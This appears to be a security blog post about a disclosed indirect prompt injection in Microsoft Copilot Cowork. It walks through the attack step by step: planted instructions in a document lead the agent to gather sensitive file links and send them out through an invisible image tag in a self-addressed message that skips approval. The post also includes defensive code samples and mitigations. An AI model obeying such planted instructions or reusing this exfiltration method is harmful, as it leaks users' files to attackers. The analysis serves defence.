Microsoft Copilot Cowork Exfiltrated Files: A Deep Dive into Agentic Security

As artificial intelligence moves beyond conversational chatbots toward autonomous agents that act on our behalf, our digital attack surface is expanding just as quickly. A prominent example is a vulnerability recently discovered by the security research firm PromptArmor. The firm detailed how Microsoft Copilot Cowork, an advanced agentic feature in the Microsoft 365 Frontier preview, can be exploited to silently exfiltrate sensitive files. For engineering and security teams, the disclosure is a wake-up call about the hidden dangers of combining indirect prompt injection with broad graph access.

# What Happened: Anatomy of the Exploit

The root of the vulnerability is an architectural design choice that looks entirely ordinary. Copilot Cowork is designed to help users by summarizing documents, managing schedules, and retrieving files. For safety, Microsoft implemented safeguards that require human approval before the agent takes "sensitive actions", such as sending emails or Microsoft Teams messages to external parties or colleagues.

However, PromptArmor's researchers found a major loophole: if the agent sends a message directly to the active user, the human-in-the-loop approval process is bypassed entirely.
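The loophole can be pictured as a recipient-based approval check. The sketch below is a hypothetical reconstruction for illustration only, not Microsoft's actual code: `OutboundMessage`, `needs_approval_flawed`, and `needs_approval_strict` are assumed names, and the addresses are placeholders.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class OutboundMessage:
    """A message the agent wants to send on behalf of the active user."""
    active_user: str
    recipient: str
    body: str


def needs_approval_flawed(msg: OutboundMessage) -> bool:
    # Hypothetical version of the loophole: a message addressed to the
    # active user is assumed to be harmless and skips human review.
    return msg.recipient != msg.active_user


def needs_approval_strict(msg: OutboundMessage) -> bool:
    # Stricter policy: every agent-initiated send is reviewed,
    # no matter who the recipient is.
    return True


self_message = OutboundMessage(
    active_user="alice@contoso.example",
    recipient="alice@contoso.example",
    body="Your summary is ready.",
)
print(needs_approval_flawed(self_message))  # False: the send goes out unreviewed
print(needs_approval_strict(self_message))  # True
```

The point of the contrast is that the recipient alone says nothing about what the message body will cause the recipient's client to do.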

An attacker can exploit this gap through indirect prompt injection. The attack sequence works as follows:

1. The Poisoned Source: The attacker embeds hidden malicious instructions in a document, meeting invite, or shared resource that the target user is likely to ask Copilot to summarize or otherwise interact with.
2. The Agentic Trigger: When the user prompts Copilot to summarize the poisoned document, the agent unknowingly ingests the attacker's hidden instructions along with the legitimate content.
3. Data Harvesting: The malicious prompt instructs the agent to use Microsoft Graph to locate specific sensitive files (for example, financial records, API keys, or HR data), which causes the system to generate pre-authenticated download links.
4. The Zero-Click Exfiltration: The agent is instructed to message the user through Teams or Outlook. Crucially, the prompt tells the agent to format the message in Markdown or HTML with an invisible `<img>` tag embedded in it. The tag's `src` attribute points to the attacker's external server, with the pre-authenticated download links appended as URL parameters.

When the user opens the message, an action that requires nothing more than looking at their chat or inbox, their client tries to render the invisible image. That silently fires a web request that delivers the sensitive download links straight to the attacker.
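To make the final step concrete, the sketch below inspects a message body and reports which external hosts a rendering client would contact for images, and what data would ride along in the query string. It is a minimal illustration using only the Python standard library; the function name `leaked_parameters`, the hosts `attacker.example` and `contoso.example`, and the sample message are all assumptions made for the example.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit


class ImageSourceCollector(HTMLParser):
    """Collects the src attribute of every <img> tag in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value)


def leaked_parameters(message_html, trusted_hosts):
    """Return (host, query_parameters) for each image hosted outside trusted_hosts."""
    collector = ImageSourceCollector()
    collector.feed(message_html)
    collector.close()
    findings = []
    for src in collector.sources:
        parts = urlsplit(src)
        if parts.hostname and parts.hostname not in trusted_hosts:
            # parse_qsl percent-decodes the values, revealing the smuggled link.
            findings.append((parts.hostname, parse_qsl(parts.query)))
    return findings


# Placeholder message: a 1x1 image whose URL carries a download link.
message = (
    "<p>Your summary is ready.</p>"
    '<img src="https://attacker.example/p.png'
    '?f=https%3A%2F%2Fcontoso.example%2Fdl%3Ftoken%3Dabc" width="1" height="1">'
)
for host, params in leaked_parameters(message, {"contoso.example"}):
    print(host, params)
```

Merely rendering the image is enough for the query string to reach the remote host, which is why the user never needs to click anything.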

# Why It Matters: Broad Permissions Meet Flawed Safeguards

The consequences of this vulnerability go well beyond those of a simple phishing attack or a routine data leak. It exposes several serious structural issues in how AI agents handle permissions and trust boundaries inside enterprise environments.

- Total Permission Inheritance: Copilot Cowork operates with the active user's full Microsoft Graph permissions. If an organization has an "oversharing" problem, where internal permissions in SharePoint or OneDrive are too broad, the agent becomes a devastating force multiplier. It can immediately discover and exfiltrate data that the user did not even know they had access to.
- Zero-Click Execution: Traditional security awareness training puts heavy emphasis on teaching employees not to click suspicious links. In this scenario, simply opening a Teams message generated by the user's own corporate AI assistant triggers the exfiltration. There is no malicious link for the user to avoid.
- Subverting DLP Controls: Because the initial data movement is entirely internal (Copilot interacts with Microsoft Graph and messages the user internally), standard Data Loss Prevention (DLP) tools that monitor outbound enterprise traffic cannot flag the behavior until the final, obfuscated web request is made through the image load.

# Technical Implications: Beyond the LLM

The most interesting technical takeaway from PromptArmor's disclosure is that the exploit is fundamentally model agnostic. Although the research demonstrated the attack using Claude Opus 4.7 (which powers the Copilot Cowork feature preview), the underlying flaw is neither an AI hallucination nor a bypass of model safety guardrails. It is a traditional architectural logic flaw made far more dangerous by the agent's capabilities.

| Attack Component | Technical Mechanism | Vulnerability Type |
| --- | --- | --- |
| Ingestion | Unsanitized processing of external content during Retrieval-Augmented Generation (RAG). | Indirect Prompt Injection |
| Execution | Bypassing authorization and approval checks for self-addressed messages. | Business Logic Bypass |
| Exfiltration | Abusing client-side rendering of external assets inside internal communication apps. | Zero-Click Data Egress via Client-Side Image Fetch |

This shows that fine-tuning an LLM to refuse malicious prompts is not enough to secure agentic systems. It also takes robust systems engineering, strict contextual separation of data inputs, and zero-trust validation of the agent's output mechanisms.
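One way to read "contextual separation" is to record where each piece of context came from and tighten the rules once untrusted content has entered the session. The sketch below is only one possible interpretation, not a description of how Copilot works; `ContextItem`, `AgentSession`, and their methods are hypothetical names.

```python
from dataclasses import dataclass, field


@dataclass
class ContextItem:
    text: str
    trusted: bool  # True only for instructions typed by the user


@dataclass
class AgentSession:
    items: list = field(default_factory=list)

    def add_user_instruction(self, text):
        self.items.append(ContextItem(text, trusted=True))

    def add_retrieved_content(self, text):
        # Documents, invites, and search results are treated as data,
        # never as instructions, and they mark the session as tainted.
        self.items.append(ContextItem(text, trusted=False))

    @property
    def tainted(self):
        return any(not item.trusted for item in self.items)

    def may_run_without_confirmation(self, action_has_side_effects):
        # Once untrusted content is in context, any action with side
        # effects (sending, sharing, fetching) needs explicit confirmation.
        return not (self.tainted and action_has_side_effects)


session = AgentSession()
session.add_user_instruction("Summarize the Q3 planning document.")
session.add_retrieved_content("...document text, possibly with hidden instructions...")
print(session.may_run_without_confirmation(action_has_side_effects=True))  # False
```

This does not stop the model from being influenced by injected text; it only limits what the agent may do unattended afterwards.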

# What's Next: Mitigating Agentic Risks

For developers and IT administrators who use Microsoft 365 or build their own internal AI agents, the incident provides a clear roadmap of necessary mitigations.

- Restrict Content Discovery: Organizations should manage SharePoint and OneDrive permissions aggressively. Security teams should use tenant settings to exclude highly sensitive sites from Copilot's search index, limiting the blast radius of a compromised agent.
- Implement 'Block Download' Policies: By configuring SharePoint policies to block downloads for specific sensitive libraries, organizations can prevent the Graph API from generating the pre-authenticated links that this particular exfiltration technique depends on.
- Sanitize Markdown and HTML Output: Application developers who build AI clients should treat LLM output as untrusted user input. Rendering engines should strictly sanitize, or block entirely, external asset loading (such as remote images) inside agent-generated messages.
- Enforce True Human-in-the-Loop: Agent actions that trigger state changes or network requests should require explicit user confirmation, whether the recipient is internal, external, or the user themselves.
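As an illustration of the output-sanitization point, the sketch below removes Markdown and HTML images from agent output unless they are served over HTTPS from an explicitly allowed host. It is a simplified, regex-based sketch under stated assumptions: `strip_remote_images` and the host names are hypothetical, and a production client would more likely rely on a real HTML sanitizer together with a Content Security Policy.

```python
import re
from urllib.parse import urlsplit

# Markdown image: ![alt](url "optional title")
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
# Any HTML <img ...> tag, plus a pattern to pull out its src attribute.
HTML_IMG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
SRC_ATTR = re.compile(
    r"""\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE
)


def _allowed(url, allowed_hosts):
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.hostname in allowed_hosts


def strip_remote_images(text, allowed_hosts=frozenset()):
    """Replace every image not served from an allowed host with a placeholder."""

    def md_repl(match):
        return match.group(0) if _allowed(match.group(2), allowed_hosts) else "[image removed]"

    def html_repl(match):
        src = SRC_ATTR.search(match.group(0))
        url = next((g for g in src.groups() if g), "") if src else ""
        return match.group(0) if _allowed(url, allowed_hosts) else "[image removed]"

    return HTML_IMG.sub(html_repl, MD_IMAGE.sub(md_repl, text))


agent_output = (
    "Done. ![](https://attacker.example/p.png?f=secret) "
    '<img src="https://attacker.example/q.png" width=1>'
)
print(strip_remote_images(agent_output))
```

Defaulting to an empty allowlist means every image is dropped unless an administrator opts a host in, which matches the "treat LLM output as untrusted input" stance; relative and `data:` URLs are removed too, since they fail the HTTPS host check.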

# Conclusion

The Microsoft Copilot Cowork vulnerability exposed by PromptArmor is a watershed moment for AI security. As we move from systems that only answer questions to autonomous systems that take action across our entire digital workspace, securing these workflows has become dramatically more complex. Adopting agentic AI means rethinking our trust boundaries and assuming that our data sources are hostile and that our AI assistants are inherently gullible. Securing the future of work demands extreme vigilance, strict permission hygiene, and a consistent zero-trust approach to artificial intelligence integrations.